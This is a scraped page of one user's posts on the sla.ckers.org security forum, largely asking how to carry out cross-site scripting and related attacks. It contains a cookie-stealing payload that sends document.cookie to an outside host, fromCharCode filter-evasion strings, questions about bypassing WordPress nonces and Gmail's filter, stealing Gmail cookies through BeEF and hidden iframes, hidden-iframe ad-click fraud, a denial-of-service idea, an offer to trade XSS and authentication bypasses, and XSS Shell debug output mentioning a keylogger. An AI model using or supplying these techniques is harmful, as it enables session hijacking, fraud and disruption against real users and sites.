Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 

Pages: 12Next
Current Page: 1 of 2
Results 1 - 30 of 39
6 years ago
lobas
lol some software company
Forum: Projects
6 years ago
lobas
this is reported clean by softpedia
Forum: Projects
7 years ago
lobas
is there anyway to bypass the wpnonce in wordpress, or steal it
Forum: CSRF and Session Info
7 years ago
lobas
Just letting you guys know of a tool under project by a friend which converts hex 2 shellcode, well kind of :) http://www.calculator-online.info/Shellcode2char.html
Forum: Projects
7 years ago
lobas
SENT U private message i can help
Forum: XSS Info
7 years ago
lobas
do u actually need an xss to preform a csrf attack
Forum: CSRF and Session Info
7 years ago
lobas
Do you have any examples of how i can use this method, as in using document.location='http://site.com/c.php?c='+escape(document.cookie).substr(0,1900)
Forum: XSS Info
7 years ago
lobas
so i can actually steal the cookie that way it just doesnt seems to work in firefox, any alternative methods for firefox/opera? using this method ty all help is greate full
Forum: XSS Info
7 years ago
lobas
your example doesnt work? i need somekind of a calculator to calc the javascript charcodes, and not manually
Forum: XSS Info
7 years ago
lobas
How do we use the example on the cheat sheet like so ';alert(String.fromCharCode(88,83,83))// can we still put document.location='http://site/c.php?c=' i have tried with just document.cookie with no luck ;alert(String.fromCharCode(68,79,67,85,77,69,78,84,110,67,79,79,75,73,69))//
Forum: XSS Info
7 years ago
lobas
it onjly transfer whe nthe xss request is made
Forum: Full Disclosure
7 years ago
lobas
i have a xss where i can execute javascript, but cant get the document.cookie because the ip has been moved, it used to be site.com but some how its transfered to 2343245234.site.com so there is no document cookie any tips to bypass this?
Forum: Full Disclosure
7 years ago
lobas
from the top one it strips it down the the second one replacing and removing <script>alert(14)</script> %2522__script_alert(14)_/script_%3D
Forum: XSS Info
7 years ago
lobas
just blocks single and double
Forum: XSS Info
7 years ago
lobas
<script>alert(14)</script> was stripped down to %2522__script_alert(14)_/script_%3D anyway to bypass
Forum: XSS Info
7 years ago
lobas
16. help
Any senn or bypassed a similar evasion techniqiue used here? http://%2522__script_alert(14)_/script_%3D
Forum: XSS Info
7 years ago
lobas
All patched if anyone reading has xss/auth bypass im willing to trade and it will be worthwhile \;:)
Forum: XSS Info
7 years ago
lobas
for there search history?
Forum: XSS Info
7 years ago
lobas
Has anybody actually bypassed the gmail webfilter inside an email, ive tried everything i know, Just seemes to be unbreakable they block everything
Forum: XSS Info
7 years ago
lobas
you could easily open a site with an iframe 100k times and refresh meta tag or grab a large file x amount of times
Forum: DoS
7 years ago
lobas
its a cool method but, for it to be fool proof and not to get reported, somehow the banner, once clicked needs to be opened within 0px/0px iframe hidden, then the script to be diabled, maybe by loading a legit page
Forum: XSS Info
7 years ago
lobas
very cool rsnake, is there anyway once the banner is clicked to not actually open the ad, maybe override the loading page wityh body onload , this method is very easy to get reported
Forum: XSS Info
7 years ago
lobas
ive tried onload doesnt work though
Forum: XSS Info
7 years ago
lobas
you have code for this?, can u show me please ive only ever doe this with a search box never been able to do it with anything else
Forum: XSS Info
7 years ago
lobas
hmm i dont think its possible to force them to click the adds you cant control mouse or clicks via browser ?
Forum: XSS Info
7 years ago
lobas
alot of these tools also say for fun and for profit i dont see the profit bit where that takes places? u cant exactly click adds with them
Forum: XSS Info
7 years ago
lobas
Via beef if you have infected a page the victim is browsing for instance http://attacker.com can you soom how with the javascript command load http://gmail.google.com// into a hidden iframe then steal the cookie ive had to sucesswith this, im guess u need a xss on gmail
Forum: XSS Info
7 years ago
lobas
that's all im getting, no connection via the admin panel, if i manualy goto xssshell.asp it just displays as clear text the goes to http://localhost/%5C%22%22? page cannot be found, although im 100% sure i have right config etc..... anyone who was got this working can u please show me steps cause the authors readme isnt really 100% correct lots of errors
Forum: XSS Info
7 years ago
lobas
oh ive just read that iss can run querys on the mdb, im still not getting no connection at all everything seems ok here is the debug CONTROLLER Debug Console!- Keylogger attached to IframeRogue - Request done for commands - http://localhost/xssshell/commands.asp?v=91459 - Request : http://localhost/xssshell/commands.asp?v=91459&r=821482393 - Remote JS DOM call started ... - init fin
Forum: XSS Info
7 years ago
lobas
rsnake? anybody :P
Forum: XSS Info
Pages: 12Next
Current Page: 1 of 2